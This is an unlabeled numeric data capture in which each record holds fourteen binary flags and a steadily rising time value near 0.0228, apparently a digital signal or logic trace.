0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2694844e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2694872e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2694896e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2694924e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2694948e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2694972e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2694996e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2695020e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2695044e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2695072e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2695096e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2695124e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2695148e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2695172e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2695196e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2695220e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2695244e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2695272e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2695296e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2695324e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2695348e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2695372e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2695396e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2695420e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2695448e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2695476e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2695500e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2695524e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2695548e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2695572e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,2.2820144e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,2.2820356e-02 1,0,1,1,1,0,0,0,0,0,0,1,0,1,2.2820384e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,2.2820408e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,1,2.2820692e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,2.2820716e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,1,2.2820724e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,1,2.2820768e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,1,2.2820792e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,2.2820800e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,1,2.2820820e-02 1,0,1,1,1,0,0,0,0,1,0,0,0,1,2.2820844e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,1,2.2820848e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,1,2.2820892e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,1,2.2820916e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,2.2820924e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,1,2.2820940e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,2.2820964e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,1,2.2820972e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2820976e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2821020e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2821044e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2821052e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2821068e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2821092e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2821096e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2821140e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2821168e-02 1,0,1,1,1,1,0,0,0,0,0,0,0,0,2.2821172e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2821176e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2821192e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2821216e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2821244e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2821268e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2821292e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2821316e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2821340e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2821364e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2821372e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2821420e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2821444e-02 1,0,1,1,1,1,0,0,0,0,0,0,0,0,2.2821448e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2821452e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2821468e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2821492e-02 1,0,1,1,1,0,0,0,0,1,0,0,0,0,2.2821496e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2821500e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2821540e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2821568e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2821572e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2821592e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2821616e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2821644e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2821668e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2821692e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2821716e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2821740e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2821764e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2821772e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2821820e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2821844e-02 1,0,1,1,1,1,0,0,0,0,0,0,0,0,2.2821848e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2821852e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2821868e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2821892e-02 1,0,1,1,1,0,0,0,0,1,0,0,0,0,2.2821896e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2821900e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2821940e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2821968e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2821972e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2821992e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2822016e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2822044e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2822068e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2822092e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2822116e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2822140e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2822164e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2822172e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2822220e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2822244e-02 1,0,1,1,1,1,0,0,0,0,0,0,0,0,2.2822248e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2822252e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2822268e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2822292e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2822316e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2822340e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2822364e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2822392e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2822416e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2822444e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2822468e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2822492e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2822516e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2822540e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2822548e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2822592e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2822620e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2822624e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2822644e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2822668e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2822692e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2822716e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2822724e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2822768e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2822792e-02 1,0,1,1,1,1,0,0,0,0,0,0,0,0,2.2822796e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2822800e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2822820e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2822844e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2822868e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2822892e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2822916e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2822940e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2822964e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2822992e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2823016e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2823044e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2823092e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2823116e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2823124e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2823140e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2823164e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2823192e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2823216e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2823244e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2823268e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2823292e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2823316e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2823324e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2823368e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2823392e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2823400e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2823420e-02 1,0,1,1,1,0,0,0,0,1,0,0,0,0,2.2823444e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2823448e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2823492e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2823516e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2823524e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2823568e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2823592e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2823644e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2823668e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2823716e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2823740e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2823748e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2823792e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2823820e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2823824e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2823868e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2823892e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2823916e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2823940e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2823964e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2823992e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2823996e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2824044e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2824068e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2824076e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2824092e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2824116e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2824140e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2824164e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2824192e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2824216e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2824244e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2824264e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2824292e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2824316e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2824340e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2824364e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2824388e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2824412e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2824440e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2824464e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2824492e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2824516e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2824540e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2824564e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2824588e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2824612e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2824640e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2824664e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2824692e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2824716e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2824740e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2824764e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2824788e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2824812e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2824840e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2824864e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2824892e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2824916e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2824940e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2824964e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2824988e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2825012e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2825040e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2825064e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2825092e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2825116e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2825140e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2825164e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2825188e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2825212e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2825240e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2825264e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2825292e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2825316e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2825340e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2825364e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2825388e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2825412e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2825440e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2825464e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2825492e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2825516e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2825540e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2825564e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2825588e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2825612e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2825644e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2825664e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2825692e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2825716e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2825740e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2825764e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2825788e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2825812e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2825844e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2825864e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2825892e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2825916e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2825940e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2825964e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2825988e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2826012e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2826040e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2826064e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2826092e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2826116e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2826140e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2826164e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2826188e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2826212e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2826240e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2826264e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2826292e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2826316e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2826340e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2826364e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2826388e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2826412e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2826440e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2826464e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2826492e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2826516e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2826540e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2826564e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2826588e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2826612e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2826640e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2826664e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2826692e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2826716e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2826740e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2826764e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2826788e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2826812e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2826840e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2826864e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2826892e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2826916e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2826940e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2826964e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2826988e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2827012e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2827040e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2827064e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2827092e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2827116e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2827140e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2827164e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2827188e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2827212e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2827240e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2827264e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2827292e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2827316e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2827340e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2827364e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2827388e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2827412e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2827440e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2827464e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2827492e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2827516e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2827540e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2827564e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,2.2952048e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,2.2952260e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,2.2952280e-02 0,1,1,1,1,0,0,0,0,0,0,1,0,1,2.2952308e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,2.2952332e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,1,2.2952616e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,1,2.2952644e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,1,2.2952692e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,1,2.2952716e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,2.2952724e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,1,2.2952740e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,2.2952768e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,1,2.2952772e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,1,2.2952820e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,1,2.2952844e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,2.2952852e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,1,2.2952868e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2952884e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2952892e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2952896e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.2952944e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2952968e-02 0,1,1,1,1,1,0,0,0,0,0,0,0,0,2.2952972e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2952976e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2952992e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2953016e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2953020e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.2953068e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2953092e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2953100e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2953116e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2953140e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2953164e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2953192e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2953220e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2953244e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2953292e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2953316e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2953324e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.2953368e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2953392e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2953400e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2953420e-02 0,1,1,1,1,0,0,0,0,1,0,0,0,0,2.2953444e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2953448e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.2953492e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2953516e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2953524e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2953540e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2953568e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2953592e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2953616e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2953644e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2953668e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2953692e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2953716e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2953724e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.2953768e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2953792e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2953800e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2953820e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2953844e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2953848e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.2953892e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2953916e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2953924e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2953940e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2953968e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2953992e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2954020e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2954044e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2954068e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2954116e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2954140e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2954148e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.2954192e-02 